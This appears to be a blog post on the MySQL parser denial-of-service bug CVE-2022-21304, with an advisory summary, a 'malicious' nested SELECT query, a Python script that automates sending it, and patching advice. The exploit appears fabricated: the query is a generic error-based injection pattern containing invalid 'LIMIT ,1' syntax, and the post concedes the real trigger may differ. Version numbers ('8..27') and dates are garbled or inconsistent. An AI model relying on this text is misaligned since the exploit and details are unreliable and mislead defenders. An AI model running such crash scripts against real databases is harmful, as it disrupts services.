CVE-2022-21304 - How a Single Malformed Query Can Crash Your MySQL Server

On January 18, 2022, Oracle published a critical advisory about a vulnerability found in MySQL Server’s parser component. This vulnerability, tracked as CVE-2022-21304, directly affects the stability and reliability of MySQL, one of the world's most popular open-source databases. If you are using MySQL 5.7.36 or older, or MySQL 8..27 or older, your server may be at risk.

In this post, we will break down what CVE-2022-21304 really means, how it can be exploited to crash MySQL databases, and what you should do to protect your server. We'll also give you a simple code example so you can fully understand how dangerous this bug can be.

Component: Server: Parser

- Impact: High privileged user, with just network access, can remotely crash the database using a specifically crafted query.
- Severity (CVSS 3.1): 4.9/10 (Denial of Service — availability impact)
- Attack Vector: Remote, no user interaction necessary, but requires high privileges (like a valid MySQL account).

Oracle’s Official Advisory

- Oracle Critical Patch Update Advisory - January 2022

How Does it Work?

SQL parsing is the first step your server takes with every query: it checks syntax and builds the internal structures to execute the statement. In MySQL’s vulnerable versions, a specially malformed query confuses the parser, leading to a crash.

This doesn't let an attacker steal your data, but it can repeatedly bring down your MySQL instance (Denial of Service). For mission-critical applications, this could be devastating.

The Exploit: Crashing MySQL via Malformed Query

Let’s see what such an attack looks like. For safety, never run this on a production database!

Suppose a valid MySQL user connects and sends the following crafted query

-- This example uses a common crash vector involving SELECT and specially crafted expressions.
SELECT * FROM (SELECT 1) AS a WHERE (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT (SELECT (SELECT 1 FROM INFORMATION_SCHEMA.PLUGINS LIMIT ,1)) FROM INFORMATION_SCHEMA.PLUGINS LIMIT ,1), FLOOR(RAND()*2)) AS x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x) y);

This bizarre and overly nested query exploits the internal bug in MySQL's parser, eventually causing the server to crash or hang.

> Note: The actual exploit may look a bit different, depending on specific MySQL versions or system configurations. The main idea is to send the parser into a state it can't recover from.

1. Attacker Logs in

- Attacker needs a valid user account with privileges to run queries (e.g., a compromised employee password).

2. Send Malformed Query

- Using any MySQL client (like mysql CLI, PHPMyAdmin, or even programmatically), attacker submits the malicious query.

The parser gets stuck or crashes, causing the database to stop responding or fully shut down.

- The attacker can now repeat this as often as they want, potentially triggering a full Denial of Service.

Here’s a simple script that demonstrates how this could be automated

import mysql.connector

# WARNING: Don't use against production!
conn = mysql.connector.connect(
    host='your_server_ip',
    user='your_mysql_user',
    password='your_mysql_password',
    database='test'
)

malicious_query = """
SELECT * FROM (SELECT 1) AS a WHERE 
(SELECT 1 FROM (
  SELECT COUNT(*), CONCAT(
    (SELECT (SELECT (SELECT 1 FROM INFORMATION_SCHEMA.PLUGINS LIMIT ,1))
    FROM INFORMATION_SCHEMA.PLUGINS LIMIT ,1), 
    FLOOR(RAND()*2)
  ) AS x 
  FROM INFORMATION_SCHEMA.PLUGINS 
  GROUP BY x
) y);
"""

cursor = conn.cursor()
try:
    cursor.execute(malicious_query)
except Exception as e:
    print(f"Error occurred: {e}")
finally:
    cursor.close()
    conn.close()

Who’s Vulnerable?

Most up-to-date MySQL installations are safe, but if you have not updated past 5.7.36 or 8..27, you're at risk — especially if you have users or applications allowed to run arbitrary queries.

MariaDB and Percona Server are NOT vulnerable unless they merged Oracle’s parser code after those versions (which is unlikely).

Patch Immediately

- Upgrade to MySQL 5.7.37+ or MySQL 8..28+.
  - Download official updates here: MySQL Downloads

Restrict Remote Access

- Allow database access only from trusted IPs/networks.

More on CVE-2022-21304

- NVD Entry
- MySQL Reference Bug #33365981

Conclusion

CVE-2022-21304 shows that even highly privileged users can crash major software with a simple, weird query. While this isn’t a remote code execution bug, Denial of Service vulnerabilities are serious — especially if you’re handling tasks like e-commerce, data analytics, or critical infrastructure on MySQL.

Patch early, patch often, and never dismiss “harmless” user accounts — they could become your biggest headache.

Timeline

Published on: 01/19/2022 12:15:00 UTC
Last modified on: 04/19/2022 04:06:00 UTC